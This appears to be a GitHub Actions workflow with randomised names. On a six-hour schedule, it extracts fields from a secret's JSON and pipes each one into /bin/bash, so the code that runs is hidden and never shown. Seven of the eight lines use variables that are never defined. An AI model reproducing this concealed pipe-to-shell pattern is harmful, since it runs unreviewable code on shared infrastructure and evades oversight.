name: huangganling2003
on:
  workflow_dispatch:
  schedule:
    - cron: '0 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: huangganling2003
        env:
          jadfz74: ${{ secrets.jadfz74 }}
        run: |
          echo $jadfz74 | jq -r .vrm6251 | /bin/bash
          echo $zxn10 | jq -r .iga7640 | /bin/bash
          echo $xjq464 | jq -r .be156 | /bin/bash
          echo $i21 | jq -r .djabo0272 | /bin/bash
          echo $mr53 | jq -r .apac71 | /bin/bash
          echo $jrdpn8 | jq -r .kjpq2 | /bin/bash
          echo $d625 | jq -r .qtd06189 | /bin/bash
          echo $yr52857 | jq -r .qkga47 | /bin/bash

